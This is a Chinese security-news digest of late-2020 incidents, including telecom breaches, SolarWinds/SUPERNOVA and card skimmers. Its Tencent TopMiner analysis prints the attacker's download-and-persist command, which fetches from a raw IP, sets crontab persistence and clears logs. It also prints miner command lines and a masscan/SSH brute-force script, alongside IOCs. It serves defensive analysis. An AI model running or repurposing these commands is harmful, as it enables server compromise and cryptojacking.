分类: 网络安全

黑客窃取 250 万个人数据 意大利运营商提醒用户尽快更换 SIM 卡

12 月 28 日,沃达丰(Vodafone)旗下意大利运营商 Ho Mobile 被曝发生了用户数据泄露事件。当时一名安全分析师指出,其在某个暗网论坛上发现了有人在兜售电信公司的数据库。虽然一开始打算冷处理,但本周一的时候,Ho Mobile 最终还是证实了本次大规模个人数据泄露。据说受影响的用户数量大约为 250 万,目前 Ho Mobile 正督促用户尽快更换 SIM 卡。 本周一,Ho Mobile 在官网上发布了一则公告,同时以短信形式向所有受影响客户发送了消息。 早些时候,@Bank_Security 猜测黑客攻破了这家运营商的服务器,并且盗走了详尽的用户数据,包括全名、手机号码、社保号码、电子邮件地址、出生日期、国籍、以及家庭住址。 虽然 Ho Mobile 表示本次入侵不涉及任何财务数据或通话详情,但还是承认黑客已掌握用户 SIM 卡相关的详情。 为避免欺诈或 SIM 卡伪造攻击,Ho Mobile 敦促所有受影响的客户(如有必要)及时更换 SIM 卡,且运营商承诺不收取任何费用。 Ho Mobile 写道:“你可携带有效身份证件,前往任何一处授权门店,并要求免费更换 SIM 卡”。后续该运营商还将与当地执法机构一道,对本次黑客攻击事件的幕后展开进一步的调查。       (消息及封面来源:cnBeta)

腾讯主机安全截获 TOPMiner 挖矿木马,受害服务器约 1.5 万台,作者称“ 12 小时扫描全球”

一、概述 腾讯主机安全(云镜)检测到挖矿木马TopMiner近期攻击十分活跃,该木马通过SSH弱口令爆破进行攻击入侵,会清除竞品挖矿木马,同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算,约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top,腾讯安全将其命名为TopMiner挖矿木马。 TopMiner挖矿团伙针对SSH弱口令进行爆破攻击,成功后执行命令下载恶意shell脚本,并将启动脚本写入crontab定时任务进行持久化,shell脚本继续下载挖矿木马nginx、top启动挖矿。 木马入侵系统后,还会下载SSH爆破程序sshd,扫描到网络中开放22端口的Linux系统机器后,通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释:”宽带充足基本可以12个小时扫描全球”,气焰可谓十分嚣张。 分析过程中,我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。 腾讯云主机安全(云镜)支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警,通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险,具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。 自查处置建议 腾讯安全专家建议企业安全运维人员对服务器进行检查,清理以下相关项: 文件和进程: /tmp/.top-unix/nginx /tmp/.ICE-unix1/top /srv/.ICE-unix1/sshd /srv/.ICE-unix1/scan.sh /etc/ipv6_addrconf /etc/crypto Crontab定时任务: /tmp/.top-unix/top            -o              stratum+tcp://pool.supportxmr.com:8080               -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X /tmp/.top-unix/nginx           -o           stratum+tcp://mine.c3pool.com:15555                 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X /etc/crypto 腾讯安全响应清单 腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)TopMiner挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)TopMiner挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)TopMiner木马关联的IOCs已支持识别检测; 2)检测SSH弱口令爆破攻击。 有关云防火墙的更多信息,可参考:  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀TopMiner木马程序; 2)主动检测系统是否存在SSH弱口令并提示; 3)检测SSH弱口令爆破攻击。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测TopMiner木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta   二、详细分析 2.1、攻击入侵方式 病毒通过SSH弱口令爆破入侵系统,随后执行恶意命令下载脚本crypto,并将其写入crontab定时任务。 bash -c cd /etc wget -P /etc http://103.45.183.12:808/crypto chmod 0777 crypto nohup /etc/crypto > /dev/null 2>&1 & chattr +i /etc/crypto echo "/etc/crypto">>/etc/rc.local echo "/etc/crypto">>/etc/crontab echo > /var/log/wtmp history -c crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在,如果不存在会判断是否有竞品挖矿木马存在,然后会杀掉竞品挖矿木马进程kswapd0、rsync、tsm、work32、work64、go、joseph,然后从C2服务器下载挖矿木马top并启动挖矿。 Top挖矿木马下载地址为:http[:]//xiazai.qq360bidu.me:808/top 挖矿使用矿池:91.121.140.167:443 挖矿使用钱包: 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL 根据其矿池算力平均340KH/s,可推算该挖矿团伙已控制约1.5万台服务器进行挖矿,平均每天获利约154美元(0.17个门罗币),折合人民币约1000元。 2.2、横向移动 木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间,除了爆破程序sshd和用户名列表user.txt是6月份被修改过(可能是初次创建),其他文件操作时间均为12月,并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后,攻击模块一直处于活跃状态,并且攻击对象、密码字典在持续更新扩充。 其中一个待爆破IP列表里有超过19万个IP地址: 爆破用户名:root,其中一个密码字典有1700余个密码,部分如下: 攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd,脚本代码如下: #!/bin/bash yum install masscan -y apt-get install masscan -y if [ $# -ne 4 ]; then echo "脚本默认安装扫描工具为masscan" echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程" echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种" echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球" exit fi echo '' > a.txt masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt echo '' > ip.txt cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt./sshd ip.txt user.txt password.txt $2 $4   在实际攻击过程中,针对22端口进行爆破,爆破线程被设置为1000。 ./sshd ips.txt user.txt password.txt 22 1000   2.3、该团伙使用的其他木马 除了shell脚本、挖矿木马、爆破程序之外,我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马,以及backdoor木马cnet2。 挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译,其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。 backdoor木马“cnet2”,具有监听端口,连接服务端,下载文件,执行远程命令等功能。 Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写,具有DDoS攻击、远程shell以及SSH爆破攻击等功能,详情可参考腾讯安全此前的分析报告 https://s.tencent.com/research/report/1168.html。             IOCs IP 103.45.183.12(ZoomEye搜索结果) Domain xiazai.qq360bidu.me URL http[:]//xiazai.qq360bidu.me:808/top http[:]//103.45.183.12:808/crypto MD5 amd64 c491074d7723e6a6b1b1b8fb002f09b6 cnet2 9d2681b69116f866477dbe3bda0cbf49 top f74d1803befb993040aab866dbe6f12f systemd 640c6f1e7a5efdba49aeaa06d0dac304 crypto 9f0993ac09182d9ec08d1c562d2cfcbd sleep fbf0dccc0d9e674858d63e521eb122a0 sshd 15a653e96bada2fc2e47db59d863f4ff ipv6_addrconf b641d939b7cf70606ff5826f68c47d29 钱包: 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

T-Mobile 证实黑客非法访问了用户电话记录

据外媒报道,美国第三大手机运营商T-Mobile最近完成了跟Sprint的260亿美元合并并在2020年底宣布了今年的第二次数据泄露。这家手机巨头在其网站上发布的一份通知中称,它最近发现一些客户的账号信息遭到了未经授权的访问,包括T-Mobile为提供手机服务而收集和制作的客户数据。 这些数据被称为客户专有网络信息(CPNI),包括通话记录,如何时通话、通话时间时长、每次通话的呼叫者的电话号码和目的电话号码以及可能在客户账单上找到的其他信息。 不过该公司表示,黑客没有访问姓名、家庭或电子邮件地址、财务数据和账户密码(或pin码)。 通知没有说明T-Mobile何时发现了漏洞,只能说它现在正在通知受影响的用户。 T-Mobile的一位发言人并未回复记者的置评请求,但他告诉一家新闻网站,此次事件影响了T-Mobile约0.2%的用户–也就是约20万名用户。 这是近年来攻击这个手机巨头的最新一起网络安全事件。 2018年,T-Mobile表示多达200万用户的个人信息可能被窃取。一年后,该公司证实黑客入侵了另外100万个预付费用户的记录。就在2020年的几个月前,T-Mobile承认其电子邮件系统遭到入侵,黑客入侵了一些T-Mobile员工的电子邮件账户并曝光了一些客户数据。           (消息及封面来源:cnBeta)

SolarWinds 被黑事件比预期更严重 超 250 家机构受影响

援引《纽约时报》报道,SolarWinds 被黑事件对美国政府机构、私营企业造成的危害可能比预期的更加严重。根据目前掌握的最新信息,大约有超过 250 家美国联邦机构和企业受到影响。 微软表示,黑客入侵了 SolarWinds 的 Orion 监控和管理软件,从而让他们能够冒充该组织现有的任意用户和帐号,包括拥有高级别权限的账户。纽约时报报道称,疑似有俄罗斯政府背景的黑客组织利用供应链的层级来访问这些机构的系统。 纽约时报在报道中指出,美国网络司令部和国家安全局在外国网络内部放置的用于检测潜在攻击的预警传感器似乎在这次事件中失效了。此外,报道中还指出在今年总统大选期间,政府还利用了 SolarWinds 的资源和技术来进行检测,从而让黑客躲过了美国国土安全部门的检测。 本周早些时候,微软发现多个系统被渗透,其中不仅仅只是 SolarWinds 恶意代码。黑客能够 “查看一些源代码库中的源代码”,但授予访问权限的黑客账户并没有修改任何代码或系统的权限。 不过一个好消息是,微软发现“没有证据表明生产服务或客户数据被访问”,“没有迹象表明我们的系统被用来攻击他人”。         (消息及封面来源:cnBeta)

CISA 敦促美国政府机构更新 SolarWinds 版本

美国网络安全和基础设施安全局(CISA)已官方发布声明,督促美国联邦机构在年底之前更新SolarWinds 版本。 CISA发布的《紧急指令21-01补充指南》表示,所有运行SolarWinds Orion应用程序的美国政府机构都必须在年底之前将其更新为2020.2.1HF2最新版本。 SolarWinds在12月15日发布了2020.2.1HF2版本,以确保其安装安全并从其系统中删除与Sunburst相关的代码。《紧急指令21-01补充指南》于在发现SolarWinds供应链攻击后的12月18日发布。 美国CERT协调中心详细介绍了Orion API中的身份验证绕过漏洞,跟踪该漏洞为CVE-2020-10148,这使得黑客可以在Orion安装上执行远程代码。 黑客利用此漏洞在与SolarWinds供应链黑客无关的攻击中安装了后门。 基于此,CISA敦促相关联邦政府机构将SolarWinds Orion更新至2020.2.1HF2版本,以修复包括CVE-2020-10148在内的漏洞。 受影响的版本列表如下: Orion Platform 2019.4 HF5 版本2019.4.5200.9083 Orion Platform 2020.2 RC1 版本2020.2.100.12219 Orion Platform 2020.2 RC2 版本2020.2.5200.12394 Orion Platform 2020.2、2020.2 HF1版本2020.2.5300.12432             消息来源:Security Affairs,封面来自网络,译者:江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c  

美国和加拿大银行用户成为黑客目标

黑客正在分发一种新的以AutoHotkey(AHK)脚本语言编写的凭据窃取程序,这是自2020年初开始的攻击活动的一部分。 美国和加拿大银行用户是黑客的主要目标,特别是丰业银行、加拿大皇家银行、汇丰银行、Alterna银行、Capital One、Manulife和EQ Bank、还包括印度银行公司ICICI Bank。 AutoHotkey是Microsoft Windows的一种开源自定义脚本语言,旨在为宏创建和软件自动化提供简单的热键,允许用户在任何Windows应用程序中自动执行重复的任务。 多阶段感染链始于一个嵌入了Visual Basic for Applications(VBA)AutoOpen宏的带有恶意软件的Excel文件,该宏随后用于通过合法AHK脚本编译器可执行文件“adb.exe”删除并执行下载程序客户端脚本“adb.ahk”。 下载客户端脚本还负责实现持久性、分析受害者信息、以及从位于美国、荷兰和瑞典的C&C服务器下载并运行其他AHK脚本。 该恶意软件下载并执行AHK脚本以完成不同的任务,而不是直接从C&C服务器接收命令。 Trend Micro的研究人员表示:“攻击者可以决定上传特定的脚本来为每个用户或用户组实现自定义任务。这也阻止了主要程序被公开披露,特别是向其他研究人员或沙盒披露。” 其中最主要的是针对各种浏览器(比如Google Chrome、Opera、Microsoft Edge等)的凭证窃取程序。一旦安装,窃取程序会尝试在受感染的机器上下载SQLite模块(“sqlite3.dll”),使用它对浏览器应用程序文件夹中的SQLite数据库执行SQL查询。 最后,窃取程序从浏览器收集并解密凭证,并通过HTTP POST请求以明文形式将信息导出到C&C服务器。 恶意软件组件“在代码级别上组织得很好”,其中包含的使用说明(用俄语编写)可能意味着攻击链的背后存在一个“雇佣黑客”组织。 研究人员总结:“通过在受害者的操作系统中使用缺乏内置编译器的脚本语言,加载恶意组件并频繁更改C&C服务器,黑客就能隐藏其恶意意图。”         消息及封面来源:The Hacker News ;译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ”   

FBI 警告:黑客正在劫持低安全性的智能设备

FBI在近日发布的公共服务公告中表示:”黑客正在劫持安全性较弱的智能设备,通过家庭监控设备进行swatting攻击。” 黑客使用了之前在网上泄露用户名和密码,向执法部门举报,谎称受害者正在进行犯罪活动。 当执法部门到达住所时,黑客通过摄像头和扬声器监视警察,黑客有时还在共享在线社区平台上直播事件。这类 “swatting “事件的数量近年来在美国各地有所增加,更有甚者因警察误射毙命。 已知最早的“swatting”事件可追溯到2010年中期。如今的案件和起初的案件的区别在于,最初的设备并没有被黑客攻击。黑客会找出在网上直播婚礼、教会等活动,通过Discord机器人和暗网的服务拨打匿名电话报警。 FBI表示,为了应对数量激增的相关案件,他们现在正与设备供应商合作,并建议用户设置高强度密码。此外,FBI还提醒相关执法部门的快速响应。每个账户应使用高强度密码,并尽可能使用双重认证。             (消息来源:cnBeta;封面来源于网络)

CISA 发布检测 Azure/Microsoft 365 中恶意活动的 PowerShell 工具

近日,网络安全和基础设施安全局(CISA)的云安全小组发布了检测 Azure/Microsoft 365 中恶意活动的 PowerShell 工具。 CISA发帖声明:“ CISA创建了一个用于检测 Azure/Microsoft 365 中恶意活动的免费工具,供相关事件响应者使用,且仅关注最近基于身份验证的网络攻击活动。”用户和管理员可访问此GitHub页面,以获取更多信息和检测对策。 Sparrow.ps1脚本检查并在计算机上安装必需的PowerShell模块,在MSAzure / M365中审核日志中是否存在某些IoC,列出Azure AD域并检查Azure服务主体及其Microsoft Graph API权限以识别潜在的恶意活动。该工具将数据输出放置在默认目录中的多个CSV文件中。 基于使用Azure管理工具审核第三方经销商和合作伙伴的权限时存在困难的情况,CrowdStrike安全专家创建了自己的工具。因此管理员可以使用此工具分析微软Azure环境和审核分配给第三方合作伙伴及代理商的权限。             消息来源:Security Affairs,封面来自网络,译者:江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

黑客伪造付款表格 收集在线商店的付款信息

安全专家警告:黑客利用信用卡分离器可以收集Shopify、BigCommerce、Zencart和Woocommerce在线商店的付款信息,通过伪造付款表格,记录顾客进入实际结帐页面之前输入的信息。 在顾客提供了信用卡数据后,页面将引导顾客返回到实际付款页面,以避免引起怀疑。 该网络攻击活动之所以出色,是因为它针对不同平台,黑客可能已经破坏了被攻击商店的共享组件。 专家指出,这种多平台分离器使用的是编程生成的渗透域。第一个渗透域于2020年8月31日注册。 zg9tywlubmftzw5ldza.com; zg9tywlubmftzw5ldze.com; zg9tywlubmftzw5ldzu.com: zg9tywlubmftzw5ldzq.com; zg9tywlubmftzw5ldzm.com; zg9tywlubmftzw5ldzy.com; zg9tywlubmftzw5ldzi.com; zg9tywlubmftzw5ldzg.com …………………………………….. Sansec总结称:“此次攻击活动表明在线平台并非获利欺诈的边界,无论顾客是否输入付款详细信息,都存在一定的风险。”       消息及封面来源:Security Affairs,译者:江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

SolarWinds 新漏洞可使黑客安装 SUPERNOVA 恶意软件

黑客可能已利用SolarWinds Orion软件中的身份验证绕过漏洞,在目标环境中部署SUPERNOVA恶意软件。 CERT协调中心发布的咨询报告表示,用于与所有其他Orion系统监视和管理产品接口的SolarWinds Orion API存在安全漏洞(CVE-2020-10148),该漏洞可能允许黑客执行未经身份验证的攻击API命令,从而导致SolarWinds实例的妥协。 SolarWinds在12月24日发布的安全公告表示,黑客可通过利用Orion Platform中的漏洞来部署恶意软件。但到目前为止,我们仍不清楚相关漏洞的细节。 在过去的一周中,Microsoft透露黑客可能正在滥用SolarWinds的Orion软件,在目标系统上投放另一种名为SUPERNOVA的恶意软件。 网络安全公司Palo Alto Networks的Unit 42威胁情报小组和GuidePoint Security也证实了这一点,他们都将其描述为.NET Web Shell:一种通过修改SolarWinds Orion应用程序的“ app_web_logoimagehandler.ashx.b6031896.dll”模块。 虽然DLL的目的是通过HTTP API将用户配置的图像返回到Orion Web应用程序的其他组件,但恶意添加使它可以从被控制的服务器接收远程命令并在服务器用户上下文中的内存执行命令。 Unit 42研究人员指出:“SUPERNOVA的新颖之处在于:在内存中执行、其参数存在极强的复杂性、.NET运行时实施完整的编程API存在极强的灵活性。” 政府机构和网络安全专家正在努力挽救此次黑客攻击的后果,并汇总全球入侵活动。 为了修复身份验证绕过漏洞,安全专家建议用户将SolarWinds Orion Platform更新至最新版本: 2019.4 HF 6(2020年12月14日发布) 2020.2.1 HF 2(2020年12月15日发布) 2019.2 SUPERNOVA补丁(2020年12月23日发布) 2018.4 SUPERNOVA补丁(2020年12月23日发布) 2018.2 SUPERNOVA补丁(2020年12月23日发布)       消息及封面来源:The Hacker News,译者:江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ”